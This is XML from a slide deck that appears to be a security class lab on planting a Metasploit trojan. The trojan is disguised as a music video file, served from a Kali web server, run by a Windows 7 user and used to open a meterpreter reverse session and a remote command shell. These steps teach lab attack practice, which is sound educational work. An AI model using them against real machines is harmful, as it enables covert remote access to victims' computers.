            <a:ext cx="2576000" cy="1455775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3546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1E25-32C8-4C3F-B125-8106084A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Install the Trojan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35F15-3A41-42E6-B9EA-AEA735DD8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Now, copy the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file into the music folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp -a  /root/.msf4/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>musicVideo.mcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/www/html/music/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verify that the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>mlc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file is in the folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Navigate to the folder:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/www/html/music/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>List all of the files of the music folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ls -a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0683A9-1E69-4691-8CC1-47E7157B0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559" y="4405243"/>
            <a:ext cx="4785851" cy="6290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7F07CE-3297-4831-9943-2F78AB5F9C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832731" y="4706600"/>
            <a:ext cx="1249757" cy="3955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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="784">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notice that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="784" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>musicVideo.mcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="784">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file is inside of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="784" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>music</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="784">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> folder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768D19-B8C3-488E-BE05-E0364281DD2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082488" y="4851596"/>
            <a:ext cx="940532" cy="52772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708658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C4156-E281-4707-8274-B82E406C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the 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C9E33-D3E8-4791-B9C9-A6453ABE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616" y="1687400"/>
            <a:ext cx="4482592" cy="1583105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Start the web server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>service apache2 start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6B04CD-0E79-4CB2-B390-8DBBC6818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241" y="2815890"/>
            <a:ext cx="4897919" cy="384510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BEC369-B4A1-4F4A-A3BD-A8FDDD35AE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5459984" y="2435352"/>
            <a:ext cx="231648" cy="380539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EAE84A3-16CD-4572-ADFF-D34D6DED2426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478472" y="2190683"/>
            <a:ext cx="1249757" cy="574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45">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Starts the Apache web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="908167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4C2D960-5F82-4919-B95D-588DB1F53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493" y="1076283"/>
            <a:ext cx="1865682" cy="136622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EF22F6-24FF-434A-98B0-4796DE56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the Victim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4E43-1F99-4AEE-B654-C64ED2C3D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617" y="1687398"/>
            <a:ext cx="4183888" cy="3194834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In the Windows environment, open Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Go to the following URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali_IP_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/music</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1568" dirty="0">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1437" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Enter your Kali’s actual IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Right-click the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>musicVideo.mcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> link, select “Save Link As…”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Save the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>musicVideo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> link to your Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1503" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should see the mcl file link appear on your Desktop, it will look like a Windows Media Center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12C32-9A30-43DA-AC1A-09976B55C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328" y="1759397"/>
            <a:ext cx="2523691" cy="159085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559B40-EBBF-43D9-A962-3CBB9F8B1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887" y="3724867"/>
            <a:ext cx="1516535" cy="128762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33EAF1-6443-4C47-A199-D0EC1D16FB7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779064" y="4012254"/>
            <a:ext cx="839200" cy="249332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CEB5B52-5A41-4EEA-BA6A-B69F88F7434D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6618264" y="3724867"/>
            <a:ext cx="1249757" cy="574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45">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Link saved on the Window’s Desktop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395716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C5D-874C-4E49-A174-F0DBE89B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Backdoor/Trojan 1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5898-58A1-4A8D-B78E-01227EFE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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Materials needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali Linux Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows 7 Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software tool used (from Kali Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note: This lab will establish a backdoor via Reverse HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34493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ED0B-DA85-478B-983E-42CE349D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the Victim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7FD32-F174-4F9B-AC24-75F280513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83" y="1707185"/>
            <a:ext cx="4855855" cy="3048282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execute the exploit by opening the music file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You may be asked to set-up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" i="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows Media Center</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1437">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>If so, set-up Windows Media Center, then re-open the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>When you open the file, you should see the option to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" b="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>musicVideo.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> file. Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" b="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-224036"/>
            <a:r>
              <a:rPr lang="en-US" sz="1503">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Since when do you "run" a music video?!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1503">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1503">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Seems odd, doesn't it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The backdoor has now been set!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The Windows user should have seen nothing happen - no music video loaded…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54D669-8EB8-490B-8D6F-4AA6A0C24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490" y="1799901"/>
            <a:ext cx="2679528" cy="1894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EB20AE-C3F3-46D2-AD6C-4E27CA8889B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5552010" y="3766604"/>
            <a:ext cx="2332189" cy="5162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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="784"/>
              <a:t>Read through this security warning!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:endParaRPr lang="en-US" sz="784"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="784"/>
              <a:t>Note: If the user were to exit out or hit cancel, this would stop the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="502917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ED0B-DA85-478B-983E-42CE349D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 the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7FD32-F174-4F9B-AC24-75F280513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616" y="1687400"/>
            <a:ext cx="7567168" cy="800708"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Go back to Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1764"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Notice a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" err="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> session has been opened</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1764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B0AA58-6585-4D85-82DC-962B989A1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90" y="2363708"/>
            <a:ext cx="5852805" cy="427487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FB0ACD-E36D-4F0E-A007-8DB0A597EE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483616" y="2875195"/>
            <a:ext cx="7567168" cy="1560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6595" tIns="16595" rIns="16595" bIns="16595" anchor="t">
            <a:normAutofit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sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" b="1">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ENTER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(allows a command to be input) and then type:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1764"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1568" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sessions –l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1568">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should see the session currently open </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1568">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1568">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with your Windows IP address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466143-A5EE-4947-B9EB-EB209B7C1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492" y="3393035"/>
            <a:ext cx="3652857" cy="1127030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50F96CD-C060-4DD6-A9BA-1B042474A584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483616" y="3457114"/>
            <a:ext cx="3385312" cy="823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6595" tIns="16595" rIns="16595" bIns="16595" anchor="t">
            <a:normAutofit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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1437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D53E0-B470-4D08-8741-4CDFA95F99C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845976" y="3212850"/>
            <a:ext cx="1100243" cy="174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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="915">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lowercase “L”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3C5285-2AD1-4A73-A20F-14DA90F45533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2230433" y="3293221"/>
            <a:ext cx="615543" cy="0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904304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7A05-D0A0-4DD0-BE2E-DEF90603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 the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C537-9B4D-4219-AB6F-354EA0BE4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616" y="1687399"/>
            <a:ext cx="7567168" cy="1168343"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use the following commands to access the Window’s Command Prompt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sessions -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1437" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should notice you are in the Windows system command line now. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>C:\&gt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1764" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial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4050C7-D79B-4C9B-8242-40AA338B02D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985848" y="1963566"/>
            <a:ext cx="1100243" cy="1541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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="784">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Number 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8797237-F347-4F14-A981-58DAEB358C15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2503792" y="2057894"/>
            <a:ext cx="614641" cy="40659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ADE0E47-69F4-4EB2-A189-F8D7EB7C5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353" y="2950056"/>
            <a:ext cx="4921705" cy="1393909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D68F5A-8D56-4E4B-9B1E-64E4B80FB150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981706" y="4571081"/>
            <a:ext cx="1294850" cy="1541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595" tIns="16595" rIns="16595" bIns="16595" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="269673"/>
            <a:r>
              <a:rPr lang="en-US" sz="784">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Command Line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B8FA18-8450-453B-9404-247F6BE8741D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1401338" y="4355819"/>
            <a:ext cx="589749" cy="309589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69648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9DE8-A4ED-48E8-ACDE-FECC698D8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Windows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D0006-828A-4B59-A89A-EB8E7EAF1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616" y="1687399"/>
            <a:ext cx="4396310" cy="2156364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Navigate to the Desktop folder:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd /users/student/Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Add a folder to the desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
